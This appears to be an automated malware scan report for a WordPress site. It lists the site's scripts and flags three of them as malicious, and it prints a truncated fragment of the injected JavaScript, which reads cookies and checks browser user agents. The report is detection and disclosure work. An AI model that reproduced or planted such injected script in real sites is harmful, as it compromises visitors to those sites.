Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thecreux.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.thecreux.com/ | 200 OK Content-Length: 32868 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js?ver=1.7.2 | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://www.thecreux.com/wp-content/plugins/wp-nivo-slider/jquery.nivo.slider.pack.js?ver=3.2 | 200 OK Content-Length: 13257 Content-Type: text/javascript | clean |
http://maps.google.com/maps/api/js?sensor=false&ver=3.7.4 | 200 OK Content-Length: 5033 Content-Type: text/javascript | clean |
http://www.thecreux.com/wp-content/themes/smartstart/js/modernizr.custom.js?ver=3.7.4 | 200 OK Content-Length: 5232 Content-Type: text/javascript | clean |
http://www.thecreux.com/wp-content/themes/smartstart/js/video-js.min.js?ver=3.7.4 | 200 OK Content-Length: 64561 Content-Type: text/javascript | clean |
http://www.thecreux.com/wp-includes/js/comment-reply.min.js?ver=3.7.4 | 200 OK Content-Length: 1809 Content-Type: text/javascript | clean |
http://www.thecreux.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.45.0-2013.10.17 | 200 OK Content-Length: 15779 Content-Type: text/javascript | clean |
http://www.thecreux.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.5.4 | 200 OK Content-Length: 9382 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t }); }; $.wpcf7SupportHtml5 = function() { var features = {}; var input = document.createElement('input'); features.placeholder = 'placeholder' in input; var inputTypes = ['email', 'url', 'tel', 'number', 'range', 'date']; $.each(inputTypes, function(index, value) { input.setAttribute('type', value); features[value] = input.type !== 'text'; }); return features; }; })(jQuery); Antivirus reports:
| ||
http://www.thecreux.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.3 | 200 OK Content-Length: 7544 Content-Type: text/javascript | clean |
http://www.thecreux.com/wp-content/themes/smartstart/js/selectivizr-and-extra-selectors.min.js?ver=3.7.4 | 200 OK Content-Length: 6765 Content-Type: text/javascript | clean |
http://www.thecreux.com/wp-content/themes/smartstart/js/respond.min.js?ver=3.7.4 | 200 OK Content-Length: 5125 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.thecreux.com/wp-content/themes/smartstart/js/jquery.easing-1.3.min.js?ver=3.7.4 | 200 OK Content-Length: 6061 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.thecreux.com/wp-content/themes/smartstart/js/jquery.fancybox.pack.js?ver=3.7.4 | 200 OK Content-Length: 25215 Content-Type: text/javascript | clean |
http://www.thecreux.com/wp-content/themes/smartstart/js/jquery.cycle.all.min.js?ver=3.7.4 | 200 OK Content-Length: 29201 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thecreux.com
Result:
GET / HTTP/1.1
Host: thecreux.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: thecreux.com
Referer: http://www.google.com/search?q=thecreux.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thecreux.com
Referer: http://www.google.com/search?q=thecreux.com
Result:
The result is similar to the first query. There are no suspicious redirects found.